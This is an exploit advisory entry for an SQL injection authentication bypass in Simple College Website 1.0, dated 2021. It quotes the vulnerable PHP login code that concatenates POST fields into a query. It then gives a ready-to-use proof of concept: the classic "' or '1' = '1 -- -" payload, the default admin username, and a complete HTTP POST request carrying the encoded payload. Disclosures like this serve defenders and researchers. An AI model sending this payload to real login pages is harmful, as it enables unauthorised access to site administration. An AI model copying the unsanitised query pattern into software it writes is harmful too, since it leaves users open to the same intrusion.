Simple College Website 1.0 SQL Injection

Risk: Medium
Local: No
Remote: Yes

# Exploit Title: Simple College Website 1.0 - 'name' Sql Injection (Authentication Bypass) # Exploit Author: Marco Catalano (@stunn4) # Date: 2021-01-25 # Vendor Homepage: # Software Link: # Affected Version: 1.0 # Vulnerable parameter: "name" (POST method) # Tested on: Linux, PHP/7.4.11 Explaination: The source of "/admin_pages/login.php" file defines the following lines of code: $name=$_POST['name']; $password=$_POST['password']; $result=mysqli_query($conn,"SELECT * FROM users WHERE name='$name' AND Password='$password'"); which are called when trying to log into the administrative panel at "/admin_pages/login.php" itself. Proof Of Concept: The user input is not properly sanitized and this leads to authentication bypass through the classic "<username>' or '1' = '1 -- -" where <username> has to be a valid username. For example, the default username is "florian". POST /admin_pages/login.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 66 Origin: Connection: close Referer: Cookie: wp-settings-time-1=1611158502; PHPSESSID=ujhslpm8cg18eeb1jd7nempudj Upgrade-Insecure-Requests: 1 name=florian%27+or+%271%27+%3D+%271+--+-&password=test&login=Login

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top